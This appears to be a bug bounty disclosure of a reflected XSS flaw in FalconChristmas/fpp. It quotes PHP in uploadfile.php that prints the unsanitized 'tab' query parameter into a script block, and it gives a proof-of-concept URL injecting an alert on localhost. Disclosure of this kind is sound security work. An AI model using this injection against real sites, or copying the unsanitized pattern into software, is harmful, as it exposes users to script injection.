Cross-site Scripting (XSS) - Reflected in FalconChristmas/fpp

Valid
Reported on May 29th 2021

✍️ Description

Hi, in https://github.com/FalconChristmas/fpp/blob/39aa11e6f9bf8e7ee63bdbb07ea9fcabf434a60e/www/uploadfile.php#L504 you build a JS script using unsanitized user input, this can lead to XSS :

<script>
    var activeTabNumber = 
<?php
    if (isset($_GET['tab']))
        print $_GET['tab'];//XSS here
    else
        print "0";
?>;
/**/
</script>

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/uploadfile.php?&tab=1;alert(%27zer0h%27) and the js line will be var activeTabNumber = 1;alert('zer0h');

💥 Impact

XSS